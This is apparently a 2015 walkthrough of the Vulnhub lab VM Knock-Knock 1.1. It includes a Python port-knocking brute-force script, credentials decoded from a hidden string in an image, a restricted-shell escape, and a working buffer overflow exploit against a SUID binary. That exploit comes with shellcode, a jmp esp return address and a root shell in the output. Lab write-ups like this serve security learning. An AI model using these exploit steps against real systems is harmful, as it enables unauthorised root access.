[Vulnhub]Knock-Knock: 1.1

“Pretty much thought of a pretty neat idea I hadn’t seen done before with a VM, and I wanted to turn it into reality! Your job is to escalate to root, and find the flag. Since I’ve gotten a few PM’s, remember: There is a difference between "Port Unreachable” and “Host Unreachable”. DHCP is not broken ;) Gotta give a huge shoutout to c0ne for helping to creating the binary challenge, and rasta_mouse and recrudesce for testing :) Also, gotta thank barrebas who was able to find a way to make things easier… but of course that is fixed with this update! ;)“ – zer0w1re

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali Linux (10.10.10.131/24)

Target: TopHatSec: Freshly (10.10.10.140/24)

Vulnerability & Exploit

  • Port knocking brute-force to open the hidden ports
  • Secret information hidden in picture
  • Buffer Overflow analysis and exploit

Method

  • Scanned the network to discover the target server [Net Discover]
  • Port scanned the target to discover the running services and open ports [nmap]
  • Analysis and write script to brute force port knocking
  • Port scanned again to dicover the real open ports [nmap]
  • Web application vulnerability scanned to discover any web vulnerability [nikto]
  • Web information gathering and interacting with the web server [firefox]
  • Download picture and reveal the hidden information
  • Crack the cipher text to get login creditional in plain text [Caesar shift with ROT 13]
  • Login SSH with cracked login creditional
  • Look around and found suspicious program with SUID bit set
  • Analysis and work out PoC to exploit BoF vulnerability in the target program to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using netdiscover as routine to detect the target’s IP address (10.10.10.140 in this case).

Then run NMAP scan to detect opening ports/running services on the target. From the result, only TCP port 1337 has been discovered running on Ubuntu Linux. nmap -v -sV -A -O -T4 -p- 10.10.10.140

Port knocking

In order to understand what Port Knocking is and how it works, I found the following 2 links: link_1, link_2.

Basically, I need to send SYN request to several random ports (3 in this case) in correct orders and valid time period, then the firewall or proxy will change the rules to open hidden ports.

Due to there are 3 ports and total 6 possible orders for the sequence, I wrote a script to try all the possibilities.

knock.py (knock.py) download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/usr/bin/env python

from socket import *
from itertools import permutations
import time

ip = "10.10.10.140"            #target IP

def Knockports(ports):
  for port in ports:
      try:
          print "[*] Knocking on port: ", port
          s2 = socket(AF_INET, SOCK_STREAM)
          s2.settimeout(0.1)           # set timeout in 0.1s
          s2.connect_ex((ip, port))
          s2.close()
      except Exception, e:
          print "[-] %s" % e

def main():
  s = socket(AF_INET, SOCK_STREAM)
  s.connect((ip, 1337))              #connect to port 1337 to grab three random ports
  r = eval(s.recv(1024))  
  s.close()

  print "received: ", r

  for comb in permutations(r):      # try all the possibility of 3-ports orders 
      print "\n[*] Trying sequence %s" % str(comb)
      Knockports(comb)

  print "[*] Done"


main()

After run the script, use nmap to check open services.

Now two more ports discovered: 22 and 80.

Next I run nikto scan on port 80 and Dirbuster to guess hidden paths as standard procedure but nothing found, only the knock knock picture. So I downloaded the picture and use command strings to check if there is anything hidden in the the picture.

Bingo! Very juicy information found in the end:

1
2
3
Login Credentials
abfnW
sax2Cw90w

After tried several different encryption methods, I found this is encrypted by Caesar cipher with ROT-13. There is an useful online Caesarian cipher decryption tool which allow me to decrypt cipher text in different ROT number to detect the correct ROT number.

After decrypted:

1
2
abfnW       -     nosaJ
sax2Cw9Ow   -     fnk2Pj9Bj

They are actually backwards, so the Login Credential is

1
2
username: Jason
password: jB9jP2knf

Now I can SSH login to the target (I tried ‘Jason’ first but failed, when I tried all lower case ‘jason’, it works)

Shell Escape

Due to the current shell is Restricted, I use python python -c "import pty; pty.spawn('/bin/bash')" to escape.

By poking around, I found a binary program ‘tfc’ with SUID bit set which normally can help us to get ROOT.

This is a file encryption program, first argument is the input file (plain text) and the second argument is the output file (cipher text), both of the input and output have to be .tfc extension.

As we can see above, reverse the input file and output file, it will decrypt the cipher text.

Now let’s try a large file to see if it has Buffer Overflow vulnerability.

1
2
3
jason@knockknock:~$ python -c "print 'A'*5000" > in.tfc
jason@knockknock:~$ ./tfc in.tfc out.tfc
Segmentation fault

Segmentation fault!! sounds like it has BoF. Then I use searchsec.sh to check what protections are enabled on it.

Cool, there is no any protection at all!

Due to gdb is not installed on the target machine, I have to download the tfc program to my Kali for further analyzing.

Why here is 0x0675c916 but not expected 0x41414141? After playing around and further analysis, this should be encrypted of 0x41414141. So I need the payload encrypted first. Thanks to knapsy. He provided a method to get encrypted data from core dump file. This method will save lots of time and works to reverse engineering the tfc program for re-writing the encryption script.

Next, I need to find where is the offset to just change the EIP. After tried several varying lengths and checking the value of return address in gdb. I finally found the offset to overwrite the return address (4124 bytes).

Due to 4 ‘A’s always starts with same bytes 'def0 5bab’ in encrypted file, So ‘def0 5bab’ can be used as a pattern to locate encrypted data in core dump file.

1
2
3
4
5
root@kali:~# python -c 'print "A" * 100' > in.tfc
root@kali:~# ./tfc in.tfc out.tfc
>> File crypted, goodbye!
root@kali:~# xxd out.tfc | head
0000000: def0 5bab 5df7 ab43 0690 fe64 6cb0 0b48  ..[.]..C...dl..H
1
2
3
4
5
root@kali:~# python -c 'print "A" * 5000' > in.tfc
root@kali:~# ./tfc in.tfc out.tfc 
Segmentation fault (core dumped)
root@kali:~# xxd core | grep 'def0 5bab'
0030700: def0 5bab 5df7 ab43 0690 fe64 6cb0 0b48  ..[.]..C...dl..H

Next, use msfelfscan to get jmp esp address.

1
2
3
4
root@kali:~# msfelfscan -j esp tfc 
[tfc]
0x08048e93 jmp esp
0x08048e93 jmp esp

Then use msf with payload (linux/x86/exec) to generate shellcode

-b switch will blacklist special characters.

Then I wrote a python script to output payload with shellcode.

payload.py (payload.py) download
1
2
3
4
5
6
7
8
9
10
11
#/usr/bin/python

shellcode = "\xb8\x87\x10\x54\x8e\xd9\xc3\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x0b\x31\x46\x15\x83\xc6\x04\x03\x46\x11\xe2\x72\x7a\x5f\xd6\xe5\x29\x39\x8e\x38\xad\x4c\xa9\x2a\x1e\x3c\x5e\xaa\x08\xed\xfc\xc3\xa6\x78\xe3\x41\xdf\x73\xe4\x65\x1f\xab\x86\x0c\x71\x9c\x35\xa6\x8d\xb5\xea\xbf\x6f\xf4\x8d"

content = 'A' * 4124
content += "\x93\x8e\x04\x08"               # 0x08048e93 jmp esp
content += "\x90" * 20                       # padding 20 NOPs to protect shellcode
content += shellcode
content += 'C' * (5000 - 4124 - 4 -20 -70)  # padding with 'C'

print content

Next, use tfc program to encrypt the payload and dump the encrypted data from core dump

1
2
3
4
5
root@kali:~/Knock# python payload.py > in.tfc
root@kali:~/Knock# ./tfc in.tfc out.tfc
Segmentation fault (core dumped)
root@kali:~/Knock# xxd /tmp/core-tfc-11-0-0-18419-1434802506 | grep 'def0 5bab'
0034340: def0 5bab 5df7 ab43 0690 fe64 6cb0 0b48  ..[.]..C...dl..H

Then use dd to carve out the encrypted data, byte by byte, skipping the first 213824 bytes (0034340 in HEX) and count is the length of exploit payload (5000 bytes)

1
2
3
4
root@kali:~/Knock# dd if=/tmp/core-tfc-11-0-0-18419-1434802506 of=exp.tfc skip=213824 count=5000 bs=1
5000+0 records in
5000+0 records out
5000 bytes (5.0 kB) copied, 0.0723968 s, 69.1 kB/s

Now try to exploit ‘tfc’ program with the encrypted exploit payload (exp.tfc):

1
2
3
4
root@kali:~/Knock# ./tfc exp.tfc pwn.tfc
# id
uid=0(root) gid=0(root) groups=0(root)
# exit

Cool, it works on my Kali!

Now, upload exp.tfc to target machine and exploit tfc to get ROOT!

Done :)

2015-06-21 04:49:54 -0400